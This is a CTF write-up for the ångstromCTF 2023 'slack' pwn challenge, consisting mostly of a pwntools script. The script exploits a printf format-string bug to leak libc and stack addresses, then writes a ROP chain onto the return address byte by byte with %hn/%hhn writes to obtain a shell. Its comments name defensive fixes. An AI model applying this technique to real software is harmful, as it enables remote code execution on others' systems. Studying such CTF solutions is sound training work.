slack
05/04/2023
By: unvariant
Tags: pwn, AngstromCTF-2023

Problem Description:
Join the ångstromCTF slack!
Hints:
None

Solve script
from pwn import *
def _open_target():
    """Choose the transport from pwntools' command-line flags.

    REMOTE connects to the challenge host, DOCKER to a local container,
    otherwise the binary is spawned as a child process.
    """
    if args.REMOTE:
        return remote("challs.actf.co", 31500)
    if args.DOCKER:
        return remote("localhost", 5000)
    return process("./slack")


# Loaded for parity with the original script; nothing below reads `file`.
file = ELF("./slack")
io = _open_target()
def parseHex():
    """Read the echoed "You: " line and return each 0x-prefixed value as an int.

    The line is split on "0x"; empty pieces are dropped and any stray "%"
    characters are stripped before each piece is parsed as base-16.
    Returns a list of ints in the order they appeared on the line.
    """
    io.recvuntil(b"You: ")
    echoed = io.recvline().decode().strip()
    return [int(piece.strip("%"), 16) for piece in echoed.split("0x") if piece]
# Bit masks; unused below but kept as in the original script.
m32 = 2**32 - 1
m64 = 2**64 - 1

# Stage 1: the service formats the message we send, so two positional %p
# conversions print the 9th and 52nd printf "arguments" as hex pointers.
# Root cause class for defenders: user input reaching printf as the format
# string. `printf("%s", msg)`, `-Wformat -Wformat-security` and
# `_FORTIFY_SOURCE` (glibc's fortified printf refuses %n in writable format
# strings) each close this.
LEAK_FMT = b"%9$p%52$p"
io.sendline(LEAK_FMT)
leak, stack = parseHex()
print(f"leak: {leak:x}")
# 0x2206a0 is the libc-relative offset of the leaked value; it is specific
# to the challenge's libc build.
base = leak - 0x2206a0
print(f"libc base: {base:x}")
print(f"stack: {stack:x}")
# retaddr = stack - 32 * 8 in the original; the same address is recomputed
# as `pointer` further down.
# Byte 3 of the stack slot 46 qwords below the leaked stack pointer;
# presumably a loop/turn counter given the name — TODO confirm in a debugger.
counter = stack - 46 * 8 + 3
print(f"counter addr: {counter:x}")
# Stage 2: aim the pointer read as printf argument 25 at `counter`, then
# write one byte through it.  Every message is NUL-padded to 13 bytes,
# hence the asserts that the format string fits in 13.
victim = counter & 0xFFFF
# %{victim}c prints `victim` characters; %25$hn then stores that count (the
# low 16 bits of `counter`) through the pointer in argument 25 — apparently
# a stack slot that is itself read as argument 55 below (TODO confirm).
attack = (f"%{victim}c%25$hn").encode()
assert(len(attack) <= 13)
io.sendafter(b"Professional): ", attack.ljust(13, b"\x00"))
# Consume the `victim` bytes of padding output before the next prompt.
io.recvn(victim)
# 128 characters printed, so %55$hhn stores 0x80 into the byte at `counter`;
# what that value means to the program is not visible here.
attack = (f"%128c%55$hhn").encode()
assert(len(attack) <= 13)
io.sendafter(b"Professional): ", attack.ljust(13, b"\x00"))
# Stage 3: four libc-relative addresses.  The offsets are specific to the
# challenge's libc build and the script does not document what each does.
chain = [base + 0x2a3e5, base + 0x1d8698, base + 0x2f575, base + 0x50d60]
# Destination: 32 qwords below the leaked stack pointer (the commented-out
# `retaddr` line computes the same address, so presumably a saved return
# address — TODO confirm).
pointer = stack - 32 * 8
for gadget in chain:
    for byte in p64(gadget):
        # Same two-step primitive as above: re-aim argument 25's pointer at
        # the next destination byte, then write that byte via argument 55.
        victim = pointer & 0xFFFF
        attack = (f"%{victim}c%25$hn").encode()
        io.sendafter(b"Professional): ", attack.ljust(13, b"\x00"))
        io.recvn(victim)
        if byte == 0:
            # "%0c" would still print one character, so a zero byte needs a
            # bare %hhn (nothing printed, count stays 0).
            io.sendafter(b"Professional): ", b"%55$hhn".ljust(13, b"\x00"))
        else:
            io.sendafter(b"Professional): ", (f"%{byte}c%55$hhn").encode().ljust(13, b"\x00"))
        pointer += 1
# Stage 4: aim argument 25 back at `counter` and store 0 there; presumably
# this ends the program's loop so the function returns onto the written
# chain — TODO confirm.
victim = counter & 0xFFFF
attack = (f"%{victim}c%25$hn").encode()
assert(len(attack) <= 13)
io.sendafter(b"Professional): ", attack.ljust(13, b"\x00"))
# Consume the `victim` bytes of padding output before the next prompt.
io.recvn(victim)
# Bare %hhn: nothing printed, so the stored byte is 0.
attack = (f"%55$hhn").encode()
assert(len(attack) <= 13)
io.sendafter(b"Professional): ", attack.ljust(13, b"\x00"))
io.interactive()